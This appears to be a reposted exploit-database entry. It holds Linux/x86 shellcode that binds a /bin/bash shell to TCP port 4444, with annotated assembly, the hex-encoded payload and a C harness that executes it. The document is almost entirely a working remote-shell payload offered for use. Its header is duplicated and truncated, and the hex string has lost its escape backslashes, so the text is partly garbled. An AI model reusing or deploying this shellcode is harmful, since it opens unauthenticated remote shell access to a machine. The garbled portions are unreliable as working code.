*
; Title : Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (100 bytes)
; Date : Jan, 2019
; Author : Joao Batista
; Website : overflw.wordpress.com
; Twit *
; Title : Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (100 bytes)
; Date : Jan, 2019
; Author : Joao Batista
; Website : overflw.wordpress.com
; Twitter : @x42x42x42x42
; SLAE-ID : 1420
; Tested on : i686 GNU/Linux
global _start
section .text
_start:
xor eax,eax
xor ebx,ebx
; socket
push ebx
inc ebx
push ebx
push 0x2
mov ecx,esp
mov al,0x66
int 0x80
; bind
xchg edi,eax
xor eax,eax
inc ebx
push eax
push word 0x5c11 ; port=4444
push bx
mov ecx, esp
push 0x10
push ecx
push edi
mov ecx,esp
mov al,0x66
int 0x80
; listen
push eax
push edi
mov ecx,esp
mov al,0x66
add ebx,2
int 0x80
;accept
push eax
push eax
push edi
mov ecx,esp
add al,0x66
inc ebx
int 0x80
;dup2
xchg ebx,eax
xor eax,eax
xor ecx,ecx
mov cl,0x2
loop:
mov al,0x3f
int 0x80
dec ecx
jns loop
;execve(/bin/sh)
push eax
push word 0x6873 ; hs
push 0x61622f2f ; ab//
push 0x6e69622f ; nib/
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al,0xb
int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char shellcode[] =
"x31xc0x31xdbx53x43x53x6ax02x89xe1xb0x66xcdx80x97x31xc0x43x50x66x68x11x5cx66x53x89xe1x6ax10x51x57x89xe1xb0x66xcdx80x50x57x89xe1xb0x66x83xc3x02xcdx80x50x50x57x89xe1x04x66x43xcdx80x93x31xc0x31xc9xb1x02xb0x3fxcdx80x49x79xf9x50x66x68x73x68x68x2fx2fx62x61x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80";
main()
{
printf("shellcode length: %d
", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
Linux x86 TCP 4444 Bindshell Shellcode
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 247